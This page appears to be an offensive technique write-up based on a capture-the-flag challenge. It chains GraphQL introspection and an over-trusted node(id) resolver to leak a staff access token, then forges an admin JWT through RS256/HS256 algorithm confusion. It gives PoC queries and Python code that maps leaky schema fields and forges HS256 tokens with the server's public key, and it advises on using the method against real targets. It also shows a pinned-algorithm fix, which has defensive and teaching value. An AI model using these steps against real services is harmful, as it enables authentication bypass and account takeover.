web python graphql introspection jwt algorithm-confusion authentication-bypass

Introspect a GraphQL schema to leak a token via an over-trusted node resolver, then forge a JWT through RS256/HS256 confusion.

GraphQL Introspection + Internal Leak + JWT Algorithm Confusion

GraphQL often exposes a rich self-describing schema, and developers over-trust generic resolvers like node(id) or admin object types meant to be internal. The auth break is two-stage: GraphQL leaks a sensitive token, then a JWT verifier that takes the algorithm from the token's own alg header lets the attacker switch RS256 to HS256 and use the server's RSA public key bytes as the HMAC secret.

Why It Works

  • Universal node(id) interfaces and exposed internal fields (accessToken, email, role) leak more than intended.
  • JWT libraries called without a strict allowed-algorithm list dispatch on the token's alg header; if the same RSA public key is passed in as the verification key, the HS256 path uses its bytes as an HMAC secret, and those bytes are public, so the attacker can sign with them too.

Vulnerable Pattern

  • Publicly reachable /graphql, enabled introspection, universal node resolvers, exposed internal fields.
  • JWT verification that takes alg from the token instead of pinning it server-side, and hands the same RSA public key object to the HS256 path, where it is treated as a raw HMAC secret.

Exploit Flow

  1. Introspect the schema and map object types — especially admin, staff, or global node(id) interfaces.
  2. Find fields exposing bearer tokens, API keys, refresh tokens, or user IDs that unlock another surface.
  3. Obtain the RSA public key (JWKS endpoint, public-key route, source or config) and test whether the verifier accepts an HS256 token MACed with that key's exact byte representation (PEM with its trailing newline, DER, or the JWK as served); a single byte of difference yields a different HMAC.
  4. Forge a token with the right claims and replay it against the secondary surface (internal upload, admin API).
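Steps 1 and 2 above, as an added example that is not part of the original page or the referenced challenge: it walks a constructed introspection response, flags object types whose fields look like secrets or identity data, checks which of them implement Node (and are therefore fetchable through node(id) with an inline fragment), and builds the follow-up node query. The type and field names in the sample (StaffNode, Viewer, accessToken) and the keyword regex are assumptions for this example.

```python
import re

# Constructed sample: a trimmed introspection response of the kind step 1 returns.
# Type and field names here are assumptions for the example, not the challenge's schema.
SAMPLE_INTROSPECTION = {
    "data": {"__schema": {"types": [
        {"name": "Query", "kind": "OBJECT", "interfaces": [],
         "fields": [{"name": "node", "type": {"name": "Node", "kind": "INTERFACE"}},
                    {"name": "viewer", "type": {"name": "Viewer", "kind": "OBJECT"}}]},
        {"name": "Node", "kind": "INTERFACE", "interfaces": [],
         "fields": [{"name": "id", "type": {"name": "ID", "kind": "SCALAR"}}]},
        {"name": "Viewer", "kind": "OBJECT", "interfaces": [{"name": "Node"}],
         "fields": [{"name": "id", "type": {"name": "ID", "kind": "SCALAR"}},
                    {"name": "email", "type": {"name": "String", "kind": "SCALAR"}}]},
        {"name": "StaffNode", "kind": "OBJECT", "interfaces": [{"name": "Node"}],
         "fields": [{"name": "id", "type": {"name": "ID", "kind": "SCALAR"}},
                    {"name": "role", "type": {"name": "String", "kind": "SCALAR"}},
                    {"name": "accessToken", "type": {"name": "String", "kind": "SCALAR"}}]},
        {"name": "String", "kind": "SCALAR", "interfaces": None, "fields": None},
        {"name": "__Schema", "kind": "OBJECT", "interfaces": [], "fields": []},
    ]}}
}

# The step-1 query: enough of __schema to recover types, their fields and interfaces.
INTROSPECTION_QUERY = (
    "{ __schema { types { name kind interfaces { name } "
    "fields { name type { name kind } } } } }"
)

# Field names worth pulling out of a leaked object (assumed keyword list).
INTERESTING = re.compile(r"token|secret|key|password|credential|session|email|role", re.I)


def index_types(introspection: dict) -> dict:
    return {t["name"]: t for t in introspection["data"]["__schema"]["types"]}


def leaky_fields(introspection: dict) -> dict:
    """Map each non-meta object type to the field names that look like secrets or identity data."""
    out = {}
    for name, t in index_types(introspection).items():
        if name.startswith("__") or t["kind"] != "OBJECT":
            continue
        hits = [f["name"] for f in (t.get("fields") or []) if INTERESTING.search(f["name"])]
        if hits:
            out[name] = hits
    return out


def node_reachable(introspection: dict, type_name: str) -> bool:
    """True if the type implements Node, so any of its objects can be fetched via node(id)."""
    t = index_types(introspection).get(type_name)
    return bool(t) and any(i["name"] == "Node" for i in (t.get("interfaces") or []))


def node_query(type_name: str, fields: list, node_id: str) -> dict:
    """Step-2 request body: pull one object through the universal node resolver."""
    quoted_id = '"' + node_id.replace('"', '\\"') + '"'
    return {"query": "{ node(id: %s) { ... on %s { %s } } }"
                     % (quoted_id, type_name, " ".join(fields))}


def plan(introspection: dict) -> dict:
    """Types worth hitting through node(id), with the fields to request from each."""
    return {name: fields for name, fields in leaky_fields(introspection).items()
            if node_reachable(introspection, name)}


if __name__ == "__main__":
    for type_name, fields in plan(SAMPLE_INTROSPECTION).items():
        print(type_name, node_query(type_name, fields, "<global-id-here>")["query"])
```

The node id itself still has to come from somewhere reachable (a list field, an error message, a frontend bundle, or a guessable base64 "Type:n" encoding), which is why step 2 pairs field discovery with any ID-bearing field the schema exposes.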

Variations

  • If introspection is disabled, probe common field names through errors, public docs, or frontend bundles.
  • If JWT confusion is blocked, leaked tokens may still be valid as-is against another internal backend.

Common Blockers

  • Strict algorithm allowlists, kid pinning, libraries that refuse PEM- or certificate-looking material as an HMAC secret (PyJWT raises InvalidKeyError for this), auth middleware on node(), or schema hardening that strips sensitive fields at the resolver level.

PoC Sketch

{"query":"{__schema{types{name}}}"}
{"query":"{node(id:\"...\"){... on StaffNode { accessToken }}}"}
# if HS256 accepted: sign a new JWT with the RSA public key as the HMAC secret
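The RS256/HS256 confusion from "Why It Works" and the last PoC line, as an added example that is not code from the page or the referenced challenge. It models a server that issues RS256 tokens, a vulnerable verifier that dispatches on the token's own alg header and hands the same key string to both paths, the attacker's forge step that MACs a new token with the public key bytes, and a hardened verifier that pins the algorithm. Assumptions: the RSA pair is a constructed toy (textbook RSA over the raw SHA-256 digest, no PKCS#1 padding, Mersenne-prime factors) and the "PEM" is a toy serialization standing in for a real SubjectPublicKeyInfo PEM; the attack depends only on the exact bytes the server passes to its JWT library, not on the key format.

```python
import base64
import hashlib
import hmac
import json

# Constructed toy RSA key pair for the victim: textbook RSA over the raw SHA-256 digest
# (no PKCS#1 padding), for illustration only. N is ~648 bits so the digest fits under it.
P, Q = 2**521 - 1, 2**127 - 1          # both Mersenne primes
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))

# What the server publishes. Real servers publish SubjectPublicKeyInfo PEM or a JWKS; this
# toy serialization stands in for it (assumption). The attack needs only the exact bytes
# the server hands its JWT library as the verification key.
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    + base64.b64encode(json.dumps({"n": N, "e": E}).encode()).decode()
    + "\n-----END PUBLIC KEY-----\n"
)


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _encode(header: dict, claims: dict) -> str:
    return f"{b64url(json.dumps(header).encode())}.{b64url(json.dumps(claims).encode())}"


def _digest(signing_input: str) -> int:
    return int.from_bytes(hashlib.sha256(signing_input.encode()).digest(), "big")


def server_issue_rs256(claims: dict) -> str:
    """Legitimate issuance: the server signs with its private exponent."""
    signing_input = _encode({"alg": "RS256", "typ": "JWT"}, claims)
    sig = pow(_digest(signing_input), D, N).to_bytes((N.bit_length() + 7) // 8, "big")
    return f"{signing_input}.{b64url(sig)}"


def _rs256_ok(key_pem: str, signing_input: str, sig: bytes) -> bool:
    pub = json.loads(base64.b64decode(key_pem.strip().splitlines()[1]))
    return pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _digest(signing_input)


def _hs256_ok(key: str, signing_input: str, sig: bytes) -> bool:
    expected = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def verify_vulnerable(token: str, key_pem: str) -> dict:
    """Vulnerable pattern: alg comes from the untrusted header and the same key string goes
    to whichever verifier it names, so the HS256 path uses the PEM text as an HMAC secret."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h))["alg"]
    if not {"RS256": _rs256_ok, "HS256": _hs256_ok}[alg](key_pem, f"{h}.{p}", b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_hardened(token: str, key_pem: str, algorithms=("RS256",)) -> dict:
    """Fix: the server pins the allowed algorithms and rejects the header before any key
    material is touched, so the RSA key never reaches an HMAC path."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg not in algorithms:
        raise ValueError(f"alg {alg!r} not allowed")
    if not _rs256_ok(key_pem, f"{h}.{p}", b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def forge_hs256_with_public_key(claims: dict, public_key_pem: str) -> str:
    """Attacker step: set alg to HS256 and MAC the token with the public key bytes."""
    signing_input = _encode({"alg": "HS256", "typ": "JWT"}, claims)
    sig = hmac.new(public_key_pem.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def demo() -> dict:
    legit = server_issue_rs256({"sub": "u-1001", "role": "user"})
    forged = forge_hs256_with_public_key({"sub": "u-1001", "role": "admin"}, PUBLIC_KEY_PEM)
    out = {
        "legit_vulnerable": verify_vulnerable(legit, PUBLIC_KEY_PEM)["role"],
        "forged_vulnerable": verify_vulnerable(forged, PUBLIC_KEY_PEM)["role"],
        "legit_hardened": verify_hardened(legit, PUBLIC_KEY_PEM)["role"],
    }
    try:
        verify_hardened(forged, PUBLIC_KEY_PEM)
        out["forged_hardened"] = "accepted"
    except ValueError as exc:
        out["forged_hardened"] = str(exc)
    return out


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

When trying this against a real target, MAC with the key exactly as the server loads it: the PEM string including its trailing newline is the usual case, but a server that reads DER or re-serializes a JWK will need those bytes instead, and a verifier that never passes the RSA key object into the HS256 path (or a library that refuses PEM-looking HMAC secrets) is not exploitable this way.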

Good Situations To Use It

  • An exposed /graphql with introspection on.
  • A node(id) resolver or admin type that returns tokens.
  • A JWT auth layer that doesn't pin the algorithm.

Sources

  • 0xFUN2026/web/skyport_ops